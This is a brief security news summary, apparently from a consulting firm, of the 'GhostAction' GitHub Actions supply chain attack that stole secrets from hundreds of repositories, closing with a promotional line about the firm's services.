GhostAction: Massive GitHub Supply Chain Attack Steals 3,325 Secrets

GhostAction: Massive GitHub Supply Chain Attack Steals 3,325 Secrets

A new large-scale supply chain attack, dubbed GhostAction, has been discovered by GitGuardian researchers.

📢 Key Findings

• Attackers hijacked maintainer accounts to push malicious GitHub Actions workflows.
• These workflows stole secrets via curl POST requests, exfiltrating them to attacker-controlled domains.
• At least 817 repositories were impacted across PyPI, npm, DockerHub, GitHub, Cloudflare, AWS, and databases.
• Roughly 3,325 secrets were stolen.
• Affected ecosystems include Python, Rust, JavaScript, and Go.
• At least 9 npm and 15 PyPI packages remain at risk until secrets are revoked.

⚠️ Impact

While some repositories quickly reverted the malicious commits, the scope reveals a significant supply chain risk.
Attackers can potentially release trojanized or malicious packages using the stolen credentials.

🔐 Response

• GitGuardian raised issues in 573 repositories and alerted GitHub, npm, and PyPI.
• The exfiltration endpoint has since gone offline, but stolen credentials may still be abused.

At Alcaeus Services, we help organizations secure their software supply chains, monitor for leaked secrets, and prevent compromise before it reaches production.